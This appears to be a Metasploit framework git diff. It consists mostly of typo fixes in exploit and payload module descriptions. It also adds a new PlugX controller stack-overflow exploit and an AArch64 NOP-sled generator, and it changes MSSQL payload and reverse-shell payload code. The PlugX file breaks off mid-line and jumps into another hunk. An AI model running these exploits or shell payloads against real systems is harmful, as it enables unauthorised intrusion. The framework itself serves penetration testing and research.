b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb index 2bab2f7f54..a5accdcda6 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb @@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'HP Data Protector 8.10 Remote Command Execution', 'Description' => %q{ This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary - commands can be execute by sending crafted requests with opcode 28 to the OmniInet - service listening on the TCP/5555 port. Since there is an strict length limitation on + commands can be executed by sending crafted requests with opcode 28 to the OmniInet + service listening on the TCP/5555 port. Since there is a strict length limitation on the command, rundll32.exe is executed, and the payload is provided through a DLL by a fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on Windows 7 SP1. diff --git a/modules/exploits/windows/misc/hp_dataprotector_install_service.rb b/modules/exploits/windows/misc/hp_dataprotector_install_service.rb index 49af5167d8..6b0fedbc0d 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_install_service.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_install_service.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'HP Data Protector 6.10/6.11/6.20 Install Service', 'Description' => %q{ - This module exploits HP Data Protector Omniinet process on Windows only. + This module exploits HP Data Protector OmniInet process on Windows only. This exploit invokes the install service function which allows an attacker to create a custom payload in the format of an executable. diff --git a/modules/exploits/windows/misc/hp_omniinet_3.rb b/modules/exploits/windows/misc/hp_omniinet_3.rb index e15d95d86d..109d5a403a 100644 --- a/modules/exploits/windows/misc/hp_omniinet_3.rb +++ b/modules/exploits/windows/misc/hp_omniinet_3.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'HP OmniInet.exe Opcode 27 Buffer Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the Hewlett-Packard + This module exploits a buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted opcode 27 packet, a remote attacker may be able to execute arbitrary code. }, diff --git a/modules/exploits/windows/misc/mini_stream.rb b/modules/exploits/windows/misc/mini_stream.rb index 0a9834f53b..301d921fc3 100644 --- a/modules/exploits/windows/misc/mini_stream.rb +++ b/modules/exploits/windows/misc/mini_stream.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Mini-Stream 3.0.1.1 Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1 - By creating a specially crafted pls file, an an attacker may be able + By creating a specially crafted pls file, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/misc/plugx.rb b/modules/exploits/windows/misc/plugx.rb new file mode 100644 index 0000000000..200f732c57 --- /dev/null +++ b/modules/exploits/windows/misc/plugx.rb @@ -0,0 +1,171 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'zlib' + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PlugX Controller Stack Overflow', + 'Description' => %q{ + This module exploits a Stack buffer overflow in the PlugX Controller (C2 server) + }, + 'Author' => 'Professor Plum', + 'License' => MSF_LICENSE, + 'References' => + [ + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + 'AllowWin32SEH' => true + }, + 'Payload' => + { + 'Space' => 0xe000, + 'BadChars' => '', + 'EncoderType' => Msf::Encoder::Type::AlphanumMixed + }, + 'Platform' => 'win', + 'DisclosureDate' => 'Jul 27 2017', + 'Targets' => + [ + ['PlugX Type I (old)', { 'xor' => 0, 'callebp' => 0x004045c4 }], + ['PlugX Type I', { 'xor' => 1, 'callebp' => 0x004045c4 }], + ['PlugX Type II', { 'xor' => 2, 'callebp' => 0x004045c4 }] + ], + 'Privileged' => false, + 'DefaultTarget' => 2) + ) + + register_options( + [ + Opt::RPORT(13579) + ] + ) + end + + def xor_stream1(key, src) + key0 = key1 = key2 = key3 = key + dst = '' + for i in 0..(src.size - 1) + key0 = (key0 + (key0 >> 3) - 0x11111111) & 0xFFFFFFFF + key1 = (key1 + (key1 >> 5) - 0x22222222) & 0xFFFFFFFF + key2 = (key2 + 0x44444444 - (key2 << 9)) & 0xFFFFFFFF + key3 = (key3 + 0x33333333 - (key3 << 7)) & 0xFFFFFFFF + new_key = (key2 + key3 + key1 + key0) & 0xFF + res = src[i].ord ^ new_key + dst += res.chr + end + dst + end + + def xor_stream1a(key, src) + key0 = key1 = key2 = key3 = key + dst = '' + for i in 0..(src.size - 1) + key0 = (key0 + (key0 >> 3) + 3) & 0xFFFFFFFF + key1 = (key1 + (key1 >> 5) + 5) & 0xFFFFFFFF + key2 = (key2 - 7 - (key2 << 9)) & 0xFFFFFFFF + key3 = (key3 - 9 - (key3 << 7)) & 0xFFFFFFFF + new_key = (key2 + key3 + key1 + key0) & 0xFF + res = src[i].ord ^ new_key + dst += res.chr + end + dst + end + + def xor_stream2(key, data) + dst = '' + for i in 0..(data.size - 1) + key = (((key << 7) & 0xFFFFFFFF) - ((key >> 3) & 0xFFFFFFFF) + i + 0x713A8FC1) & 0xFFFFFFFF + dst += ((key & 0xFF) ^ ((key >> 8) & 0xFF) ^ ((key >> 16) & 0xFF) ^ data[i].ord ^ ((key >> 24) & 0xFF)).chr + end + dst + end + + def xor_wrap(key, data) + if target['xor'] == 0 + return xor_stream1a(key, data) + elsif target['xor'] == 1 + return xor_stream1(key, data) + elsif target['xor'] == 2 + return xor_stream2(key, data) + end + print_status('Unknown PlugX Type') + end + + def validate_response(data) + if data.nil? + print_status('Server closed connection') + return false + end + if data.empty? + print_status('No response recieved') + return false + end + if data.size < 16 + print_status('Invalid packet') + print_status(data.inspect) + return false + end + key = data[0..4].unpack(' "SPlayer 3.7 Content-Type Buffer Overflow", 'Description' => %q{ - This module exploits a vulnerability in SPlayer v3.7 or piror. When SPlayer + This module exploits a vulnerability in SPlayer v3.7 or prior. When SPlayer requests the URL of a media file (video or audio), it is possible to gain arbitrary remote code execution due to a buffer overflow caused by an exceeding length of data as the 'Content-Type' parameter. diff --git a/modules/exploits/windows/misc/stream_down_bof.rb b/modules/exploits/windows/misc/stream_down_bof.rb index 4183d0abb6..04a6a2f070 100644 --- a/modules/exploits/windows/misc/stream_down_bof.rb +++ b/modules/exploits/windows/misc/stream_down_bof.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'CoCSoft StreamDown 6.8.0 Buffer Overflow', 'Description' => %q{ Stream Down 6.8.0 seh based buffer overflow triggered when processing - the server reponse packet.During the overflow a structured exception + the server response packet. During the overflow a structured exception handler is overwritten. }, 'Author' => 'Fady Mohamed Osman ', diff --git a/modules/exploits/windows/misc/windows_rsh.rb b/modules/exploits/windows/misc/windows_rsh.rb index 8e0b046f6e..e98c90f778 100644 --- a/modules/exploits/windows/misc/windows_rsh.rb +++ b/modules/exploits/windows/misc/windows_rsh.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Windows RSH Daemon Buffer Overflow', 'Description' => %q{ - This module exploits a vulnerabliltiy in Windows RSH daemon 1.8. + This module exploits a vulnerability in Windows RSH daemon 1.8. The vulnerability is due to a failure to check for the length of input sent to the RSH server. A CPORT of 512 -> 1023 must be configured for the exploit to be successful. diff --git a/modules/exploits/windows/misc/wireshark_lua.rb b/modules/exploits/windows/misc/wireshark_lua.rb index 2a577b4a44..7e3a0fbf07 100644 --- a/modules/exploits/windows/misc/wireshark_lua.rb +++ b/modules/exploits/windows/misc/wireshark_lua.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "Wireshark console.lua Pre-Loading Script Execution", 'Description' => %q{ - This modules exploits a vulnerability in Wireshark 1.6 or less. When opening a + This module exploits a vulnerability in Wireshark 1.6 or less. When opening a pcap file, Wireshark will actually check if there's a 'console.lua' file in the same directory, and then parse/execute the script if found. Versions affected by this vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8 diff --git a/modules/exploits/windows/misc/wireshark_packet_dect.rb b/modules/exploits/windows/misc/wireshark_packet_dect.rb index 7ce4a89a34..89a0351356 100644 --- a/modules/exploits/windows/misc/wireshark_packet_dect.rb +++ b/modules/exploits/windows/misc/wireshark_packet_dect.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Wireshark packet-dect.c Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Wireshark <= 1.4.4 - by sending an malicious packet. + by sending a malicious packet. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/motorola/timbuktu_fileupload.rb b/modules/exploits/windows/motorola/timbuktu_fileupload.rb index 00c492eef1..0de5bdcb6a 100644 --- a/modules/exploits/windows/motorola/timbuktu_fileupload.rb +++ b/modules/exploits/windows/motorola/timbuktu_fileupload.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Timbuktu Pro Directory Traversal/File Upload', 'Description' => %q{ - This module exploits a directory traversal vulnerablity in Motorola's + This module exploits a directory traversal vulnerability in Motorola's Timbuktu Pro for Windows 8.6.5. }, 'Author' => [ 'MC' ], diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb index 45793d5786..5420a0e997 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb @@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote This exploit smashes several pointers, as shown below. 1. pointer to a 32-bit value that is set to 0 - 2. pointer to a 32-bit value that is set to a length influcenced by the buffer + 2. pointer to a 32-bit value that is set to a length influenced by the buffer length. 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000, this value is referenced with a displacement of 0x38. For MSSQL 2005, the diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb index 409ef5346e..e786810528 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote This exploit smashes several pointers, as shown below. 1. pointer to a 32-bit value that is set to 0 - 2. pointer to a 32-bit value that is set to a length influcenced by the buffer + 2. pointer to a 32-bit value that is set to a length influenced by the buffer length. 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000, this value is referenced with a displacement of 0x38. For MSSQL 2005, the diff --git a/modules/exploits/windows/mssql/mssql_clr_payload.rb b/modules/exploits/windows/mssql/mssql_clr_payload.rb index b0dd4167ef..43efd74621 100644 --- a/modules/exploits/windows/mssql/mssql_clr_payload.rb +++ b/modules/exploits/windows/mssql/mssql_clr_payload.rb @@ -96,7 +96,13 @@ class MetasploitModule < Msf::Exploit::Remote end def set_trustworthy(on) - mssql_query("ALTER DATABASE [#{datastore['DATABASE']}] SET TRUSTWORTHY #{on ? 'ON' : 'OFF'}", false) + result = mssql_query("ALTER DATABASE [#{datastore['DATABASE']}] SET TRUSTWORTHY #{on ? 'ON' : 'OFF'}", false) + unless result[:errors].empty? + result[:errors].each do |err| + vprint_error(err) + end + fail_with(Failure::Unknown, "Failed to change Trustworthy setting") + end end def is_trustworthy @@ -112,7 +118,13 @@ RECONFIGURE; EXEC sp_configure 'clr enabled', #{enable ? 1 : 0}; RECONFIGURE; ^ - mssql_query(query, false) + result = mssql_query(query, false) + unless result[:errors].empty? + result[:errors].each do |err| + vprint_error(err) + end + fail_with(Failure::Unknown, "Failed to change CLR setting") + end end def is_clr_enabled diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb index 9fa775f868..0b019721b1 100644 --- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb +++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote up a exploit/multi/handler to run in the background as a job to support multiple incoming shells. - If you are interested in deploying payloads to spefic servers this module also + If you are interested in deploying payloads to specific servers this module also supports that functionality via the "DEPLOYLIST" option. Currently, the module is capable of delivering payloads to both 32bit and 64bit diff --git a/modules/exploits/windows/mssql/mssql_payload.rb b/modules/exploits/windows/mssql/mssql_payload.rb index a11b0f6b52..4bb86ac3d1 100644 --- a/modules/exploits/windows/mssql/mssql_payload.rb +++ b/modules/exploits/windows/mssql/mssql_payload.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote the "xp_cmdshell" stored procedure. Currently, three delivery methods are supported. First, the original method uses Windows 'debug.com'. File size restrictions are - avoidied by incorporating the debug bypass method presented by SecureStat at + avoided by incorporating the debug bypass method presented by SecureStat at Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems. A second method takes advantage of the Command Stager subsystem. This allows using diff --git a/modules/exploits/windows/mssql/mssql_payload_sqli.rb b/modules/exploits/windows/mssql/mssql_payload_sqli.rb index ba54836cb3..1715ff15b2 100644 --- a/modules/exploits/windows/mssql/mssql_payload_sqli.rb +++ b/modules/exploits/windows/mssql/mssql_payload_sqli.rb @@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote Currently, three delivery methods are supported. First, the original method uses Windows 'debug.com'. File size restrictions are - avoidied by incorporating the debug bypass method presented by SecureStat at + avoided by incorporating the debug bypass method presented by SecureStat at Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems. A second method takes advantage of the Command Stager subsystem. This allows using diff --git a/modules/exploits/windows/oracle/tns_arguments.rb b/modules/exploits/windows/oracle/tns_arguments.rb index 081d5c44ef..15353554dc 100644 --- a/modules/exploits/windows/oracle/tns_arguments.rb +++ b/modules/exploits/windows/oracle/tns_arguments.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Oracle 8i. When - sending a specially crafted packet containing a overly long + sending a specially crafted packet containing an overly long ARGUMENTS string to the TNS service, an attacker may be able to execute arbitrary code. }, diff --git a/modules/exploits/windows/scada/daq_factory_bof.rb b/modules/exploits/windows/scada/daq_factory_bof.rb index 2b1173ceed..ec883aed77 100644 --- a/modules/exploits/windows/scada/daq_factory_bof.rb +++ b/modules/exploits/windows/scada/daq_factory_bof.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'DaqFactory HMI NETB Request Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Azeotech's DaqFactory - product. The specfic vulnerability is triggered when sending a specially crafted + product. The specific vulnerability is triggered when sending a specially crafted 'NETB' request to port 20034. Exploitation of this vulnerability may take a few seconds due to the use of egghunter. This vulnerability was one of the 14 releases discovered by researcher Luigi Auriemma. diff --git a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb index fce4e3a57f..cfa6ca1f24 100644 --- a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb +++ b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module abuses the gefebt.exe component in GE Proficy CIMPLICITY, reachable through the CIMPLICIY CimWebServer. The vulnerable component allows to execute remote BCL files in - shared resources. An attacker can abuse this behaviour to execute a malicious BCL and + shared resources. An attacker can abuse this behavior to execute a malicious BCL and drop an arbitrary EXE. The last one can be executed remotely through the WebView server. This module has been tested successfully in GE Proficy CIMPLICITY 7.5 with the embedded CimWebServer. This module starts a WebDAV server to provide the malicious BCL files. If diff --git a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb index 7ad8893628..5ce73ca6c1 100644 --- a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb +++ b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote Web Studio Remote Agent, that allows a remote attacker to write arbitrary files to the filesystem, by abusing the functions provided by the software. - The module uses uses the Windows Management Instrumentation service to execute an + The module uses the Windows Management Instrumentation service to execute an arbitrary payload on vulnerable installations of InduSoft Web Studio on Windows pre Vista. It has been successfully tested on InduSoft Web Studio 6.1 SP6 over Windows XP SP3 and Windows 2003 SP2. diff --git a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb index dd1f914955..c611b2679f 100644 --- a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb +++ b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote SCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE packet via port 910, RealWin will try to create a file (which would be saved to C:\Program Files\DATAC\Real Win\RW-version\filename) by first copying the user- - supplied filename with a inline memcpy routine without proper bounds checking, which + supplied filename with an inline memcpy routine without proper bounds checking, which results a stack-based buffer overflow, allowing arbitrary remote code execution. Tested version: 2.0 (Build 6.1.8.10) diff --git a/modules/exploits/windows/scada/scadapro_cmdexe.rb b/modules/exploits/windows/scada/scadapro_cmdexe.rb index 49b8242736..7af6fc5c3c 100644 --- a/modules/exploits/windows/scada/scadapro_cmdexe.rb +++ b/modules/exploits/windows/scada/scadapro_cmdexe.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Measuresoft ScadaPro Remote Command Execution', 'Description' => %q{ - This module allows remote attackers to execute arbitray commands on the + This module allows remote attackers to execute arbitrary commands on the affected system by abusing via Directory Traversal attack when using the 'xf' command (execute function). An attacker can execute system() from msvcrt.dll to upload a backdoor and gain remote code execution. This diff --git a/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb b/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb index bd597f7009..355b633083 100644 --- a/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb +++ b/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb @@ -12,9 +12,9 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow', 'Description' => %q{ - This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability + This module exploits a stack based buffer overflow on Yokogawa CS3000. The vulnerability exists in the service BKFSim_vhfd.exe when using malicious user-controlled data to create - logs using functions like vsprintf and memcpy in a insecure way. This module has been + logs using functions like vsprintf and memcpy in an insecure way. This module has been tested successfully on Yokogawa Centum CS3000 R3.08.50 over Windows XP SP3. }, 'Author' => diff --git a/modules/exploits/windows/smb/generic_smb_dll_injection.rb b/modules/exploits/windows/smb/generic_smb_dll_injection.rb index 4f0bab3fdf..6a03a0623f 100644 --- a/modules/exploits/windows/smb/generic_smb_dll_injection.rb +++ b/modules/exploits/windows/smb/generic_smb_dll_injection.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Generic DLL Injection From Shared Resource', 'Description' => %q{ This is a general-purpose module for exploiting conditions where a DLL can be loaded - from an specified SMB share. This module serves payloads as DLLs over an SMB service. + from a specified SMB share. This module serves payloads as DLLs over an SMB service. }, 'Author' => [ diff --git a/modules/exploits/windows/smb/ms04_007_killbill.rb b/modules/exploits/windows/smb/ms04_007_killbill.rb index 58121746a1..df5a44880f 100644 --- a/modules/exploits/windows/smb/ms04_007_killbill.rb +++ b/modules/exploits/windows/smb/ms04_007_killbill.rb @@ -22,14 +22,14 @@ class MetasploitModule < Msf::Exploit::Remote You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself - in 60 seconds. If the payload succeeeds, the system will no + in 60 seconds. If the payload succeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. This exploit has been successfully tested with the win32/*/reverse_tcp - payloads, however a few problems were encounted when using the + payloads, however a few problems were encountered when using the equivalent bind payloads. Your mileage may vary. }, diff --git a/modules/exploits/windows/smb/ms06_070_wkssvc.rb b/modules/exploits/windows/smb/ms06_070_wkssvc.rb index 7c57f771fa..229f3f6250 100644 --- a/modules/exploits/windows/smb/ms06_070_wkssvc.rb +++ b/modules/exploits/windows/smb/ms06_070_wkssvc.rb @@ -17,9 +17,9 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect function using the Workstation service in Windows 2000 SP4 and Windows XP SP2. - In order to exploit this vulnerability, you must specify a the name of a + In order to exploit this vulnerability, you must specify the name of a valid Windows DOMAIN. It may be possible to satisfy this condition by using - a custom dns and ldap setup, however that method is not covered here. + a custom DNS and LDAP setup, however that method is not covered here. Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator credentials are required to reach the vulnerable code. Windows XP SP1 only diff --git a/modules/exploits/windows/smb/ms17_010_eternalblue.rb b/modules/exploits/windows/smb/ms17_010_eternalblue.rb index 31e4970250..f5d6921f73 100644 --- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb +++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb @@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the - exploit. If the user supplies credentials in the SMBUser,SMBPass, and SMBDomain options it will use + exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or diff --git a/modules/nops/aarch64/simple.rb b/modules/nops/aarch64/simple.rb new file mode 100644 index 0000000000..ae29aa5c47 --- /dev/null +++ b/modules/nops/aarch64/simple.rb @@ -0,0 +1,44 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +### +# +# SingleByte +# ---------- +# +# This class implements simple NOP generator for AARCH64 +# +### +class MetasploitModule < Msf::Nop + + def initialize + super( + 'Name' => 'Simple', + 'Alias' => 'armle_simple', + 'Description' => 'Simple NOP generator', + 'License' => MSF_LICENSE, + 'Arch' => ARCH_AARCH64) + register_advanced_options( + [ + OptBool.new('RandomNops', [ false, "Generate a random NOP sled", true ]) + ]) + end + + def generate_sled(length, opts) + random = opts['Random'] || datastore['RandomNops'] + nops = [ + 0xd503201f, # nop + 0xaa0103e1, # mov x1, x1 + 0xaa0203e2, # mov x2, x2 + 0x2a0303e3, # mov w3, w3 + 0x2a0403e4, # mov w4, w4 + ] + if random + return ([nops[rand(nops.length)]].pack("V*") * (length/4)) + end + return ([nops[0]].pack("V*") * (length/4)) + end +end + diff --git a/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb b/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb index 32b3826344..d457562c72 100644 --- a/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb +++ b/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb @@ -22,7 +22,7 @@ module MetasploitModule super(merge_info(info, 'Name' => 'Z/OS (MVS) Command Shell, Reverse TCP', 'Description' => 'Provide JCL which creates a reverse shell - This implmentation does not include ebcdic character translation, + This implementation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.', 'Author' => 'Bigendian Smalls', diff --git a/modules/payloads/singles/cmd/unix/bind_nodejs.rb b/modules/payloads/singles/cmd/unix/bind_nodejs.rb index 799a3ebf59..20da3cc306 100644 --- a/modules/payloads/singles/cmd/unix/bind_nodejs.rb +++ b/modules/payloads/singles/cmd/unix/bind_nodejs.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 1843 + CachedSize = 2351 include Msf::Payload::Single include Msf::Payload::NodeJS diff --git a/modules/payloads/singles/cmd/unix/bind_r.rb b/modules/payloads/singles/cmd/unix/bind_r.rb index 7d459efd63..7c548c31c7 100644 --- a/modules/payloads/singles/cmd/unix/bind_r.rb +++ b/modules/payloads/singles/cmd/unix/bind_r.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 516 + CachedSize = 132 include Msf::Payload::Single include Msf::Payload::R @@ -27,7 +27,7 @@ module MetasploitModule 'Handler' => Msf::Handler::BindTcp, 'Session' => Msf::Sessions::CommandShell, 'PayloadType' => 'cmd', - 'RequiredCmd' => 'ruby', + 'RequiredCmd' => 'R', 'Payload' => { 'Offsets' => {}, 'Payload' => '' } )) end diff --git a/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb index cf22b14f24..5156e73ead 100644 --- a/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb @@ -17,7 +17,7 @@ module MetasploitModule def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Reverse TCP (via ncat)', - 'Description' => 'Creates an interactive shell via ncat, utilising ssl mode', + 'Description' => 'Creates an interactive shell via ncat, utilizing ssl mode', 'Author' => 'C_Sto', 'License' => MSF_LICENSE, 'Platform' => 'unix', diff --git a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb index 78af919c31..3149942c66 100644 --- a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb +++ b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 1971 + CachedSize = 2423 include Msf::Payload::Single include Msf::Payload::NodeJS diff --git a/modules/payloads/singles/cmd/unix/reverse_r.rb b/modules/payloads/singles/cmd/unix/reverse_r.rb index 7a87703e65..41dd7aa025 100644 --- a/modules/payloads/singles/cmd/unix/reverse_r.rb +++ b/modules/payloads/singles/cmd/unix/reverse_r.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 516 + CachedSize = 157 include Msf::Payload::Single include Msf::Payload::R @@ -22,11 +22,12 @@ module MetasploitModule 'Description' => 'Connect back and create a command shell via R', 'Author' => [ 'RageLtMan' ], 'License' => MSF_LICENSE, - 'Platform' => 'r', - 'Arch' => ARCH_R, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, 'Handler' => Msf::Handler::ReverseTcp, 'Session' => Msf::Sessions::CommandShell, - 'PayloadType' => 'r', + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'R', 'Payload' => { 'Offsets' => {}, 'Payload' => '' } )) end diff --git a/modules/payloads/singles/firefox/exec.rb b/modules/payloads/singles/firefox/exec.rb index bcfe43ccb2..002d07c520 100644 --- a/modules/payloads/singles/firefox/exec.rb +++ b/modules/payloads/singles/firefox/exec.rb @@ -14,7 +14,7 @@ module MetasploitModule super(merge_info(info, 'Name' => 'Firefox XPCOM Execute Command', 'Description' => %Q| - This module runs a shell command on the target OS withough touching the disk. + This module runs a shell command on the target OS without touching the disk. On Windows, this command will flash the command prompt momentarily. This can be avoided by setting WSCRIPT to true, which drops a jscript "launcher" to disk that hides the prompt. diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb index 2143baed9d..25b4b456e2 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 675048 + CachedSize = 675112 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb index a8b830d7b1..7f493ef8e9 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 675048 + CachedSize = 675112 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb index 12a24a3808..4c1b96f0db 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 675048 + CachedSize = 675112 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb index 9f288cbb42..4fff3cf0a5 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 